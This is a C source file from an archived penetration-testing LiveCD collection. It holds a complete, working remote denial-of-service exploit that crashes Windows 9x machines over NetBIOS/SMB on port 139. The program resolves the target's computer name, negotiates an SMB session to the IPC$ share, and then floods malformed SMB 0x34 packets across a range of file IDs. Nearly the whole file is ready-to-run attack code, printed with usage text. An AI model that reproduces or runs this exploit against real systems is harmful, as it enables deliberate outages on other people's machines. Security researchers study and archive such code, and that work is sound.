home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / wssbo.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  8KB  |  301 lines

---

1. #include <windows.h>
2. #include <winsock.h>
3. #include <stdio.h>
4. #include <string.h>
5.  
6.  
7. int main(int argc, char **argv)
8. {
9. char *server;
10. char buff[1000];
11. char buff2[1000];
12. char buffgetname[]=
13. {0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
14. 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
15. 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
16. 0x00,0x01};
17. char name;
18. char myname[0x200]={"hello"};
19. char servername[]={"*SMBSERVER"};
20. char buff3[]=
21. {0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,
22. 0x46,0x48,0x45,0x50,0x46,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,
23. 0x43,0x41,0x43,0x41,00,0x20,0x45,0x48,0x46,0x46,0x45,0x46,0x46,0x44,0x46,0x45,
24. 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
25. 0x43,0x41,0x43,0x41,0x41,0x41,00
26. };
27. char buff4[]={
28. 0x0,0x0,0x0,0x9a,0xff,0x53,0x4d,0x42,0x72,00,00, 00, 00, 00, 00, 00, 00, 00,
29. 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 ,0x00,0x00,0x00,0x00,0x00,0x00,
30. 0x00,0x77,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,
31. 0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,0x4d,0x49,0x43,0x52,
32. 0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,
33. 0x2e,0x30,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,
34. 0x32,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,
35. 0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,
36. 0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4e,
37. 0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0
38. };
39. int fileid_begin=0x600;
40. int fileid_end=0x8ff;
41. char smbchr[]={"SMBr"};
42. char namereturn[]={0x82,0,0,0,0};
43. char ipaddr[]={"192.168.1.1"};
44. char ipaddrbak[]={"127.0.0.1"};
45.  
46. int port,gethost;
47. int fd,fd2;
48.  
49. struct sockaddr_in s_in,s_in2,s_in3;
50. struct linger time_out;
51. struct hostent *he;
52. int i,j,k;
53. SOCKET d_ip;
54. WSADATA wsaData;
55. int result= WSAStartup(MAKEWORD(1, 1), &wsaData);
56. if (result != 0) {
57.         fprintf(stderr, "Your computer was not connected "
58.             "to the Internet at the time that "
59.             "this program was launched, or you "
60.             "do not have a 32-bit "
61.             "connection to the Internet.");
62.         exit(1);
63.     }
64.  
65.  
66. if(argc <2)
67. {
68. WSACleanup( );
69.     fprintf(stderr,"\n nuke win9x netbios .\n copy by yuange(yuange@nsfocus.com) 2000.4.1. \n
70.                        wellcome to our homepage http://www.nsfocus.com .");
71.     fprintf(stderr, "\n usage: %s <server> [port] \n", argv[0]);
72. exit(1);
73. }
74. if(argc>=2)
75. server = argv[1];
76. else server=&ipaddr;
77. d_ip = inet_addr(server);
78.  
79. if(d_ip==-1){
80. he = gethostbyname(server);
81. if(!he)
82. {
83. WSACleanup( );
84.     printf("\n Can't get the ip of %s !\n",server);
85. exit(1);
86.     }
87.     else memcpy(&d_ip, he->h_addr, 4);
88.  
89. }
90. if(argc>2) port = atoi(argv[2]);
91. else port=139;
92.  
93. fd = socket(AF_INET, SOCK_STREAM,0);
94. i=8000;
95. setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));
96.  
97. s_in.sin_family = AF_INET;
98. s_in.sin_port = htons(port);
99. s_in.sin_addr.s_addr = d_ip;
100. printf("\n nuke ip: %s port %d",inet_ntoa(s_in.sin_addr),htons(s_in.sin_port));
101.  
102. if(!connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in))){
103.  
104. fd2 = socket(AF_INET, SOCK_DGRAM,0);
105.     i=8000;
106.     setsockopt(fd2,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));
107.  
108. s_in2.sin_family = AF_INET;
109. s_in2.sin_port = htons(500);
110. s_in2.sin_addr.s_addr =0;
111.  
112.     s_in3.sin_family = AF_INET;
113. s_in3.sin_port = htons(137);
114. s_in3.sin_addr.s_addr = d_ip;
115.     bind(fd2,&s_in2, sizeof(struct sockaddr_in));
116. for(k=0;k<10;++k){
117.         printf("\n connect the smb %d times",k+1);
118. sendto(fd2,buffgetname,0x32,0,&s_in3,sizeof(struct sockaddr_in));
119.         i= sizeof(struct sockaddr_in);
120.  
121.         for(i=0;i<520;++i) buff2[i]=0;
122.     j=recvfrom(fd2,buff2,500,0,&s_in3,&i);
123.         i=0x39;
124.         while(i<j){
125.             if(buff2[i+0x0f]==0x20) {
126.                 memcpy(servername,buff2+i,0x40);
127.                 break;
128.             }
129.             i+=0x12;
130.         }
131.  
132.         if(i>=j){
133.         he=gethostbyaddr(&d_ip,sizeof(d_ip),PF_INET);
134.     if(he) memcpy(servername,he->h_name,0x40);
135.         }
136.         printf("\n server computername: %s",servername);
137.  
138.     gethost=0;
139.     for(i=0;i<16;++i){
140.         name=servername[i] ;
141.         if(name==0) gethost=1;
142.         if(gethost==1) name=0x20;
143.         buff3[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
144.         buff3[2*i+6]= (name & 0x000F) + 'A';
145.         }
146.     buff3[37]=0;
147.     gethost=0;
148.     for(i=0;i<16;++i){
149.             name=servername[i];
150.             if(name==0) gethost=1;
151.         if(gethost==1) name=0x20;
152.         buff3[2*i+39]= ( (name >> 4) & 0x000F ) + 'A';
153.         buff3[2*i+40]= (name & 0x000F) + 'A';
154.  
155.         }
156.     buff3[71]=0;
157.  
158.     i=send(fd,buff3,0x48,0);
159.     printf("\n send name packet %d bytes",i);
160.     buff2[0]=0;
161.     buff2[1]=0;
162.     buff2[2]=0;
163.     buff2[3]=0;
164.     buff2[4]=0;
165.     i=recv(fd,buff2,600,0);
166.     printf("\n recv :");
167.     if(i>0){
168.             for(j=0;j<i;++j) {
169.                 name=(char * )buff2[j];
170.                 printf("%d ",name);
171.             }
172.         }
173.         if(memcmp(buff2,namereturn,4)==0) k=100;
174.     }
175.  
176.     closesocket(fd2);
177.     if(k<100){
178.     printf("\n Can't Negative! \n");
179. closesocket(fd);
180.     WSACleanup( );
181. exit(1);
182.     }
183.     buff4[0]=0;
184.     buff4[1]=0;
185.     buff4[2]=0;
186.     buff4[3]=0x9a;
187.     buff4[4]=0xff;
188.     buff4[5]='S';
189.     buff4[6]='M';
190.     buff4[7]='B';
191.     buff4[8]=0x72;
192.     buff4[0x25]=0x77;
193.     j=send(fd,buff4,0x9e,0);
194.         printf("\n send smb 0x72 packet %d bytes",j);
195.  
196.  
197.         buff2[4]=0;
198.         buff2[5]=0;
199.         buff2[6]=0;
200.         j=recv(fd,buff2,600,0);
201.         printf("\n recv packet %d bytes:\n",j);
202.         if(strcmp(buff2+5,smbchr)!=0){
203.             printf("\n Can't login \\\\%s\\ipc$! \n",inet_ntoa(s_in.sin_addr));
204.         closesocket(fd);
205.         WSACleanup( );
206.         exit(1);
207.         }
208.         name=buff2[0x27];
209.         name&=0x01;
210.         if(name==1){
211.         printf("\n Only can nuke win9x system,can't nuke winnt system.\n");
212.         closesocket(fd);
213.         WSACleanup( );
214.         exit(1);
215.         }
216.  
217.         printf("\nBegin smb packet nuke !");
218.  
219. /* snd smb 0x73 packet */
220. for(i=0;i<400;++i) buff[i]=0;
221.     buff[0]=0;
222.     buff[1]=0;
223.     buff[2]=0;
224.     buff[3]=0x9e+strlen(servername);
225.     buff[4]=0xff;
226.     buff[5]='S';
227.     buff[6]='M';
228.     buff[7]='B';
229.     buff[8]=0x73;
230.     buff[0x24]=0x0d;
231.     buff[0x25]=0x75;
232.     buff[0x27]=0x86;
233.     buff[0x29]=0x68;
234.     buff[0x2a]=0x0b;
235.     buff[0x2b]=0x32;
236.     buff[0x33]=0x18;
237.     buff[0x3b]=0x05;
238.     buff[0x3f]=0x49;
239.     buff[0x59]=0x41;
240.     buff[0x5a]=0x44;
241.     buff[0x5b]=0x4d;
242.     buff[0x5c]=0x49;
243.     buff[0x5d]=0x4e;
244.     buff[0x4e]=0x49;
245.     buff[0x4f]=0x53;
246.     buff[0x50]=0x54;
247.     buff[0x51]=0x52;
248.     buff[0x52]=0x41;
249.     buff[0x53]=0x54;
250.     buff[0x54]=0x4f;
251.     buff[0x55]=0x52;
252.  
253.     buff[0x8a]=0x04;
254.     buff[0x8b]=0xff;
255.     buff[0x8f]=0x02;
256.     buff[0x91]=1;
257.  
258.     buff[0x93]=13+strlen(servername);
259.     buff[0x96]=0x5c;
260.     buff[0x97]=0x5c;
261.  
262.         strcpy(buff+0x98,servername);
263.         strcpy(buff+0x98+strlen(servername),"\\IPC$");
264.         strcpy(buff+0x9e+strlen(servername),"IPC");
265.  
266.         j=send(fd,buff,0xa2+strlen(servername),0);
267.         printf("\n send smb 0x73 packet %d bytes",j);
268.  
269.         j=recv(fd,buff2,600,0);
270.         printf("\n recv packet %d bytes",j);
271.  
272.  
273. /* send smb 0x34 packet */
274.     for(i=0;i<400;++i) buff[i]=0;
275.         buff[0]=0;
276.     buff[1]=0;
277.     buff[2]=0;
278.     buff[3]=0x25;
279.     buff[4]=0xff;
280.     buff[5]='S';
281.     buff[6]='M';
282.     buff[7]='B';
283.     buff[8]=0x34;
284.     buff[0x24]=0x01;
285.     for(i=fileid_begin;i<fileid_end;++i){
286.         buff[0x25]=i%0x100;
287.         buff[0x26]=i/0x100;
288.         j=send(fd,buff,0x29,0);
289.         printf("\n send smb 0x34 packet long %d",j);
290.             printf(" FileId: %d",i);
291.         }
292. }
293. else printf("\n connect err !\n");
294.  
295. closesocket(fd);
296. WSACleanup( );
297. return(0);
298. }
299.  
300.  
301.